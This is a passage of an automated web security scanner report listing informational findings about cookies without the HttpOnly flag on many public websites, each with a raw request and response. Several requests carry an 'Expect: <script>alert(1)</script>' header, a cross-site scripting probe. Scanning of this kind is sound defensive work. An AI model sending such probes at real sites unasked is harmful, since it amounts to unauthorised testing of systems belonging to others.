The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coloniallife.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:36:34 GMT
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BlueStripe.PVN=4c4000052c1; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

13.147. http://www.creditacceptance.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditacceptance.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwwwCApool80=358900746.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.creditacceptance.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1606
Set-Cookie: BIGipServerwwwCApool80=358900746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...

13.148. http://www.dinnerplates.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dinnerplates.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ServerCache=1813256970.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dinnerplates.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 894
Content-Type: image/x-icon
Last-Modified: Thu, 06 Aug 2009 19:52:49 GMT
Accept-Ranges: bytes
P3P: CP="IDC DSP COR ADM CUR DEV TAI PSA CON OUR IND COM DEM PRE STA"
Date: Tue, 03 May 2011 10:14:24 GMT
Set-Cookie: ServerCache=1813256970.20480.0000; path=/
Server_Id: BO3.20.108

..............h.......(....... ...................................~s@0w4#w4#w4#w4#w4#w4#w4#w4#w4#w4#.B3..{.....xw4#w4#w4#w4#w4#w4#w4#w4#w4#w4#w4#w4#w4#w4#...~>-x5$x5$x5$x5$x5$x5$x5$x5$x5$x5$x5$x5$x5$
...[SNIP]...

13.149. http://www.eatdrinkbetter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eatdrinkbetter.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

__cfduid=de433de03393d0df6ed544e38456586281304421436; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.eatdrinkbetter.com
__cfduid=de433de03393d0df6ed544e38456586281304421436; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.eatdrinkbetter.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eatdrinkbetter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.150. http://www.einsurancemarket.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.einsurancemarket.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=IIOZYLS172.16.16.135CKMYK; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.einsurancemarket.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=IIOZYLS172.16.16.135CKMYK; path=/
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:27:47 GMT
Content-Length: 1245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

13.151. http://www.ej.ru/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ej.ru
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=V++6B02/5FQDfAPRvSq8Ag==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=yes.no; path=/pid/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ej.ru
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 03 May 2011 11:17:40 GMT
Content-Type: image/x-icon
Connection: keep-alive
Keep-Alive: timeout=20
Last-Modified: Thu, 13 Mar 2008 10:25:28 GMT
ETag: "db3806-e36-f8f07600"
Accept-Ranges: bytes
Content-Length: 3638
Set-Cookie: uid=V++6B02/5FQDfAPRvSq8Ag==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=yes.no; path=/pid/

...... ..........&...........h.......(... ...@...................................H2...r..............S?.............ve.._L..............jX............................................................
...[SNIP]...

13.152. http://www.expressionery.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expressionery.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerexpressionery=4162588844.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expressionery.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Mon, 14 Sep 2009 19:40:21 GMT
Accept-Ranges: bytes
ETag: "da414c327335ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:35:19 GMT
Content-Length: 3638
Set-Cookie: BIGipServerexpressionery=4162588844.20480.0000; path=/

..............h...&... ..............(....... ...........@...........................oz....k.........FUy.............Zg..1Br...... c.........dq..&8l.....O]..........|...>Nv..'d.................`m..8I
...[SNIP]...

13.153. http://www.eztradein.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eztradein.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

acecookie=R2356732001; path=/
acecookie=R1959549351; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eztradein.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: acecookie=R2356732001; path=/
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:43:37 GMT
Set-Cookie: acecookie=R1959549351; path=/

13.154. http://www.familycorner.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.familycorner.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerFamilycorner_www_pool=469438636.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.familycorner.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:37:02 GMT
Server: Apache/2.0.59 (CentOS)
Content-Length: 475
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerFamilycorner_www_pool=469438636.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

13.155. http://www.foodsaver.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foodsaver.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Cart=CartId=5Vz%2fWc6xAUg%3d; domain=.foodsaver.com; expires=Wed, 04-May-2011 11:38:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foodsaver.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.156. http://www.fr.st/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fr.st
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Lost=173.193.214.243.1304419578148714; path=/; expires=Wed, 02-May-12 10:46:18 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fr.st
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:18 GMT
Server: Apache/2.2.3
Set-Cookie: Lost=173.193.214.243.1304419578148714; path=/; expires=Wed, 02-May-12 10:46:18 GMT
Last-Modified: Thu, 15 Apr 2010 08:42:22 GMT
ETag: "44c90fe-1ece-484427924b780;4a1e1c739a540"
Accept-Ranges: bytes
Content-Length: 7886
Connection: close
Content-Type: image/x-icon

............ .h...6......... .. ...... .... .....&...(....... ..... .....@...................................DAC.........................................................DAC.....}{}...................
...[SNIP]...

13.157. http://www.france3.fr/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.france3.fr
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerPool-HTTP-PHP5=4256176084.36895.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.france3.fr
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:16:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.4
Content-Length: 2425
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerPool-HTTP-PHP5=4256176084.36895.0000; path=/
Accept-Ranges: bytes
Cache-Control: private, max-age=3600
Age: 0
Expires: Tue, 03 May 2011 12:16:55 GMT
X-Cache-Rules: 365d - 1h
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr" xml:lang="fr" dir="ltr">
<head><tit
...[SNIP]...

13.158. http://www.freebeerandhotwings.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebeerandhotwings.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_wjqqh_ubml2svtuz.dpn=ffffffff09091c3c45525d5f4f58455e445a4a423660;expires=Tue, 03-May-2011 11:30:40 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freebeerandhotwings.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA date=200707131605)/Tomcat-5.5
ETag: W/"1150-1238469684000"
Last-Modified: Tue, 31 Mar 2009 03:21:24 GMT
Content-Length: 1150
Date: Tue, 03 May 2011 10:30:40 GMT
Set-Cookie: NSC_wjqqh_ubml2svtuz.dpn=ffffffff09091c3c45525d5f4f58455e445a4a423660;expires=Tue, 03-May-2011 11:30:40 GMT;path=/

............ .h.......(....... ..... .........................................3..%3...3...3...3...3...3...3..A............................3..{3...3...3...3...3...3...3...3...3...3...................3.
...[SNIP]...

13.159. http://www.freightlinertrucks.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freightlinertrucks.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerFreightliner=2634285738.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freightlinertrucks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:36:30 GMT
Set-Cookie: BIGipServerFreightliner=2634285738.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

13.160. http://www.fujifilmusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fujifilmusa.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=6b0413ac0000901f; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fujifilmusa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"894-1303704029768"
Last-Modified: Mon, 25 Apr 2011 04:00:29 GMT
Content-Length: 894
Date: Tue, 03 May 2011 10:48:52 GMT
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=6b0413ac0000901f; Path=/

..............h.......(....... ...........@...................m..m..m..m..r.
x....!../..?..N.._..p......................................................................................................
...[SNIP]...

13.161. http://www.gardens.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gardens.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerdavesgarden_pool=434442412.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gardens.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:53:04 GMT
Server: Apache
Content-Length: 389
X-Cnection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerdavesgarden_pool=434442412.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

13.162. http://www.gecu-ep.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gecu-ep.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Apache=173.193.214.243.1304421545774269; path=/; expires=Fri, 30-Apr-21 11:19:05 GMT; domain=.gecu-ep.org

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gecu-ep.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.163. http://www.getastrology.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.getastrology.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Witango_UserReference=D1430ED746EB0C68799CF7EE5CE84DBFE75B; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.getastrology.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.164. http://www.gigamoves.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gigamoves.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mc-qspe-hn-iuuq-pvu=446c313f3660;expires=Tue, 03-May-11 11:06:14 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gigamoves.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 11:04:14 GMT
Server: Apache/2.2.3 (Fedora)
Content-Length: 389
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_mc-qspe-hn-iuuq-pvu=446c313f3660;expires=Tue, 03-May-11 11:06:14 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

13.165. http://www.girlfriendorgasms.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.girlfriendorgasms.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RNLBSERVERID=ded355; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.girlfriendorgasms.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 11:01:30 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: RNLBSERVERID=ded355; path=/
Content-Length: 378

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...

13.166. http://www.gravitydefyer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gravitydefyer.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NS_VER=2011.1.0; domain=www.gravitydefyer.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gravitydefyer.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:45 GMT
Server: Apache
Content-Length: 0
Expires: 0
NS_RTIMER_COMPOSITE: 637595820:73686F702D6A6176613030322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NS_VER=2011.1.0; domain=www.gravitydefyer.com; path=/
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: image/x-icon

13.167. http://www.greentreepayday.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greentreepayday.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

epersist=/Kh04BBssRRIf7qk0jcBLxoBfj8+Jy2KHEnX9JNWGL0CGoaFp7D1bR3dViRNA/PAhS0KeGCjfGcl; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greentreepayday.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
ETag: "9kDr3Z5tiX0"
Last-Modified: Wed, 07 Apr 2010 11:18:30 GMT
Accept-Ranges: bytes
Content-Length: 1406
Date: Tue, 03 May 2011 10:29:20 GMT
Set-Cookie: epersist=/Kh04BBssRRIf7qk0jcBLxoBfj8+Jy2KHEnX9JNWGL0CGoaFp7D1bR3dViRNA/PAhS0KeGCjfGcl; path=/

..............h.......(....... .....................................w.W>..................lL.......7.......:.q\8..qR...l.......r.....gQ*.W>..............kV0.....[C....s.......v......................z
...[SNIP]...

13.168. http://www.gsmls.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gsmls.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JESSIONID=italy; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gsmls.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Accept-Ranges: bytes
ETag: W/"8566-1247767439000"
Last-Modified: Thu, 16 Jul 2009 18:03:59 GMT
Content-Length: 8566
Date: Tue, 03 May 2011 12:42:50 GMT
Connection: close
Set-Cookie: JESSIONID=italy; path=/
Cache-control: private

...... .... .....&... .... .........(... ...@..... ...................................................................................................................................................
...[SNIP]...

13.169. http://www.gwinnettcounty.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gwinnettcounty.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GC-GOV=R3840386780; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gwinnettcounty.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: GC-GOV=R3840386780; path=/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 03 May 2011 10:42:56 GMT
Content-Length: 2397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...

13.170. http://www.hcr-manorcare.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hcr-manorcare.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerProd_Internet_Site_Servers=1343180496.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hcr-manorcare.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:41:13 GMT
Set-Cookie: BIGipServerProd_Internet_Site_Servers=1343180496.20480.0000; path=/

13.171. http://www.hlj.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hlj.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HLJUserId=22X/QU2/2PIhXh7lECHnAg==; expires=Wed, 02-May-12 10:29:06 GMT; domain=hlj.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hlj.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.172. http://www.humana-military.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.humana-military.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.ivnbob-njmjubsz.dpn_80=ffffffff86001e4145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.humana-military.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 822
Content-Type: image/x-icon
Last-Modified: Wed, 30 Mar 2011 13:48:27 GMT
Accept-Ranges: bytes
ETag: "8e7c5025e1eecb1:43d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:44:04 GMT
Set-Cookie: NSC_xxx.ivnbob-njmjubsz.dpn_80=ffffffff86001e4145525d5f4f58455e445a4a423660;path=/

BM6.......6...(........................................................................................S..S..S..S..S..S...........S..S..S..S..S..S...........S..S.......................S..S............
...[SNIP]...

13.173. http://www.imoutdoorsmedia.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imoutdoorsmedia.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AWSELB=C5C37DB4894441DF66FD72C64D274A588833AFC8D94A0CA91455EDB540ED58B0B8EC5D9B3D36641A63F74DEFFFDD16C963482874F2F701B07BDA5FB87E03BDAE2E1BB688;MAX-AGE=3600

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imoutdoorsmedia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
